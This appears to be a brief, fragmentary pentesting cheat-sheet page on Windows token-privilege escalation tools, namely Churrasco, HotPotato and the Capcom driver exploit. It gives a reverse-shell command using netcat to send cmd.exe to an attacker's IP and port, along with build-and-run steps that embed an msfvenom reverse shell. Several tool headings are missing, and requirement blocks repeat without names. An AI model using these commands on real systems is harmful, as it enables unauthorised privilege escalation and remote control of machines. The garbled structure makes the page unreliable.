windows token exploits

Churrasco

REQUIREMENTS:

  • SeImpersonalPrivilege

  • Windows XP/VISTA/2003/2008, Win Server 2003

# usage
> churrasco.exe -d "nc.exe -e cmd.exe IP PORT"

HotPotato

  • Windows 7,8,10, Server 2008, Server 2012

REQUIREMENTS:

REQUIREMENTS:

  • SeImpersonatePrivilege

  • Win10, Server 2016, Server 2019

REQUIREMENTS:

  • SeImpersonatePrivilege

  • machine is >= Windows 10 1809 & Windows Server 2019

REQUIREMENTS:

  • Visual Studio to compile

Steps:

  1. obtain user SID

    1. Get-ADUser -Identity 'svc-print' | select SID

    2. (New-Object System.Security.Principal.NTAccount("svc-print")).Translate([System.Security.Principal.SecurityIdentifier]).value

  2. Generate .exe msfvenom reverse shell

  3. Update path to reverse shell on target line 410 in file ExploitCapcom.cpp

  4. Set for RELEASE

  5. Build Solution

  6. run .\ExploitCapcom.exe

SeBackupPrivilege

Last updated

Was this helpful?